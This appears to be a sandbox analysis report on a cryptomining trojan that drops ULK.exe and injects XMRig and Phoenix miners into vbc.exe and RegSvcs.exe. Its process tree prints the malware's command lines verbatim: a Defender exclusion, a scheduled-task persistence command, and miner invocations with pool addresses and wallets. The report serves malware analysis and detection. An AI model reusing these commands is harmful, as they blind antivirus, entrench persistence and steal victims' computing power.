Analysis

max time kernel: 61s
max time network: 149s
platform: windows10-2004_x64
resource: win10v2004-20220812-en
resource tags: arch:x64, arch:x86, image:win10v2004-20220812-en, locale:en-us, os:windows10-2004-x64, system
submitted: 30-09-2022 20:24
Static task: static1
Behavioral task: behavioral1
Sample: 89ab000fd432f9ffda0c7d77ee273cf42b2c33b15caa2ef9b393a6c02ae66f7d.exe
Resource: win7-20220901-en
General

Target: 89ab000fd432f9ffda0c7d77ee273cf42b2c33b15caa2ef9b393a6c02ae66f7d.exe
Size: 844KB
MD5: 64305a05cadf0f450c184acbc40c9f15
SHA1: 9c946fce006da78a7a9e2fb22199a381d0d03775
SHA256: 89ab000fd432f9ffda0c7d77ee273cf42b2c33b15caa2ef9b393a6c02ae66f7d
SHA512: 342a1892b18fdd24bc3ff00a75142f47feb5e68419e5db9e3021a043966e36b843578214a566e92e80c9c788f7a1809b40d9172d8ff382e8255ed869b99c7c7d
SSDEEP: 12288:DN43C+LS+Eb4Y/O23Aca/nORmxBcYeiBp:x4S+UJ/CciOReB
Malware Config
Signatures

- Detects Phoenix Miner Payload (3 IoCs)
  resource                                                                      yara_rule
  behavioral2/memory/1576-164-0x0000000140000000-0x000000014082B000-memory.dmp  miner_phoenix
  behavioral2/memory/1576-163-0x0000000140000000-0x000000014082B000-memory.dmp  miner_phoenix
  behavioral2/memory/1576-166-0x0000000140000000-0x000000014082B000-memory.dmp  miner_phoenix

- XMRig Miner payload (6 IoCs)
  resource                                                                      yara_rule
  behavioral2/memory/1420-152-0x0000000140000000-0x00000001407C9000-memory.dmp  xmrig
  behavioral2/memory/1420-153-0x0000000140343234-mapping.dmp                    xmrig
  behavioral2/memory/1420-154-0x0000000140000000-0x00000001407C9000-memory.dmp  xmrig
  behavioral2/memory/1420-155-0x0000000140000000-0x00000001407C9000-memory.dmp  xmrig
  behavioral2/memory/1420-157-0x0000000140000000-0x00000001407C9000-memory.dmp  xmrig
  behavioral2/memory/1420-167-0x0000000140000000-0x00000001407C9000-memory.dmp  xmrig

- Executes dropped EXE (1 IoC)
  pid   process
  2616  ULK.exe

- [signature title not captured on page] (6 IoCs, yara rule upx)
  resource                                                                      yara_rule
  behavioral2/memory/1576-159-0x0000000140000000-0x000000014082B000-memory.dmp  upx
  behavioral2/memory/1576-161-0x0000000140000000-0x000000014082B000-memory.dmp  upx
  behavioral2/memory/1576-162-0x0000000140000000-0x000000014082B000-memory.dmp  upx
  behavioral2/memory/1576-164-0x0000000140000000-0x000000014082B000-memory.dmp  upx
  behavioral2/memory/1576-163-0x0000000140000000-0x000000014082B000-memory.dmp  upx
  behavioral2/memory/1576-166-0x0000000140000000-0x000000014082B000-memory.dmp  upx

- Checks computer location settings (2 TTPs, 1 IoC)
  Looks up the country code configured in the registry, likely a geofence.
  description        ioc                                                                                                  process
  Key value queried  \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation  ULK.exe

- Uses the VBS compiler for execution (1 TTP)

- Suspicious use of NtSetInformationThreadHideFromDebugger (2 IoCs)
  pid   process
  1576  RegSvcs.exe
  1576  RegSvcs.exe

- Suspicious use of SetThreadContext (2 IoCs)
  description                          pid   process  target process
  PID 2616 set thread context of 1420  2616  ULK.exe  vbc.exe
  PID 2616 set thread context of 1576  2616  ULK.exe  RegSvcs.exe

- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

- Creates scheduled task(s) (1 TTP, 1 IoC)
  Schtasks is often used by malware for persistence or to perform post-infection execution.

- Delays execution with timeout.exe (1 IoC)
  pid  process
  856  timeout.exe

- Suspicious behavior: EnumeratesProcesses (6 IoCs)
  pid   process
  2576  powershell.exe
  2576  powershell.exe
  540   powershell.exe
  540   powershell.exe
  2616  ULK.exe
  2616  ULK.exe

- Suspicious behavior: LoadsDriver (1 IoC)
  pid  process
  652  (process name not recorded)

- Suspicious use of AdjustPrivilegeToken (6 IoCs)
  description                   pid   process
  Token: SeDebugPrivilege       1576  89ab000fd432f9ffda0c7d77ee273cf42b2c33b15caa2ef9b393a6c02ae66f7d.exe
  Token: SeDebugPrivilege       2576  powershell.exe
  Token: SeDebugPrivilege       2616  ULK.exe
  Token: SeDebugPrivilege       540   powershell.exe
  Token: SeLockMemoryPrivilege  1420  vbc.exe
  Token: SeLockMemoryPrivilege  1420  vbc.exe

- Suspicious use of FindShellTrayWindow (1 IoC)
  pid   process
  1420  vbc.exe

- Suspicious use of WriteProcessMemory (35 IoCs)
  Identical "PID X wrote to memory of Y" rows are collapsed; the count column gives how many times each row appears (35 in total).
  pid   process                                                                pid written to  target process  count
  1576  89ab000fd432f9ffda0c7d77ee273cf42b2c33b15caa2ef9b393a6c02ae66f7d.exe  2576            powershell.exe  2
  1576  89ab000fd432f9ffda0c7d77ee273cf42b2c33b15caa2ef9b393a6c02ae66f7d.exe  5060            cmd.exe         2
  5060  cmd.exe                                                                856             timeout.exe     2
  5060  cmd.exe                                                                2616            ULK.exe         2
  2616  ULK.exe                                                                540             powershell.exe  2
  2616  ULK.exe                                                                116             cmd.exe         2
  116   cmd.exe                                                                2952            schtasks.exe    2
  2616  ULK.exe                                                                1420            vbc.exe         14
  2616  ULK.exe                                                                1576            RegSvcs.exe     7
Processes

Indentation shows the parent/child relationship; the bracketed number is the depth the report assigns to each process.

[1] C:\Users\Admin\AppData\Local\Temp\89ab000fd432f9ffda0c7d77ee273cf42b2c33b15caa2ef9b393a6c02ae66f7d.exe
    command line: "C:\Users\Admin\AppData\Local\Temp\89ab000fd432f9ffda0c7d77ee273cf42b2c33b15caa2ef9b393a6c02ae66f7d.exe"
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory

    [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        command line: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken

    [2] C:\Windows\system32\cmd.exe
        command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp9426.tmp.bat""
        - Suspicious use of WriteProcessMemory

        [3] C:\Windows\system32\timeout.exe
            command line: timeout 3
            - Delays execution with timeout.exe

        [3] C:\ProgramData\updateWindows\ULK.exe
            command line: "C:\ProgramData\updateWindows\ULK.exe"
            - Executes dropped EXE
            - Checks computer location settings
            - Suspicious use of SetThreadContext
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
            - Suspicious use of WriteProcessMemory

            [4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                command line: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
                - Suspicious behavior: EnumeratesProcesses
                - Suspicious use of AdjustPrivilegeToken

            [4] C:\Windows\System32\cmd.exe
                command line: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "ULK" /tr "C:\ProgramData\updateWindows\ULK.exe"
                - Suspicious use of WriteProcessMemory

                [5] C:\Windows\system32\schtasks.exe
                    command line: schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "ULK" /tr "C:\ProgramData\updateWindows\ULK.exe"
                    - Creates scheduled task(s)

            [4] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
                command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -a cryptonight-heavy --url=pool.hashvault.pro:5555 -u 42T9sTTMxUFKM5dzD4Abv21q91YTVw3icZc6NkWGa2psJd8MCPtzXjtWNpjcTYtN9Ri83rPq7dGKBjhn3pyH5vGGG9d5FC7 -R --variant=-1 --max-cpu-usage=50 --donate-level=1 -opencl
                - Suspicious use of AdjustPrivilegeToken
                - Suspicious use of FindShellTrayWindow

            [4] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe
                command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe -pool ssl://eu1-etc.ethermine.org:5555 -wal 0xAA676adD882a7792EE0d7f3bBf25c045292b5d8e.Rig001 -coin etc -log 0
                - Suspicious use of NtSetInformationThreadHideFromDebugger
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads

C:\ProgramData\updateWindows\ULK.exe
  Filesize: 844KB
  MD5: 64305a05cadf0f450c184acbc40c9f15
  SHA1: 9c946fce006da78a7a9e2fb22199a381d0d03775
  SHA256: 89ab000fd432f9ffda0c7d77ee273cf42b2c33b15caa2ef9b393a6c02ae66f7d
  SHA512: 342a1892b18fdd24bc3ff00a75142f47feb5e68419e5db9e3021a043966e36b843578214a566e92e80c9c788f7a1809b40d9172d8ff382e8255ed869b99c7c7d

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
  Filesize: 2KB
  MD5: d85ba6ff808d9e5444a4b369f5bc2730
  SHA1: 31aa9d96590fff6981b315e0b391b575e4c0804a
  SHA256: 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
  SHA512: 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 944B
  MD5: 77d622bb1a5b250869a3238b9bc1402b
  SHA1: d47f4003c2554b9dfc4c16f22460b331886b191b
  SHA256: f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb
  SHA512: d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

C:\Users\Admin\AppData\Local\Temp\tmp9426.tmp.bat
  Filesize: 145B
  MD5: 131129112dff074d7beb27a970d785f1
  SHA1: ffbe95a81a8a8a26d42c1bb0d322b6bd9259ee7e
  SHA256: cfca106366cc929c453b54bdd4f928cb2ac27f16444c962dd0a70568f23e1f4e
  SHA512: 071eaa7b57235ccaed0035d3477187247ed4f763ee63555029cfdaffd4d714ff687ff72bf9b04c65ced757a13eded5a692e7ea3a14eb2a63f486c52b03f28159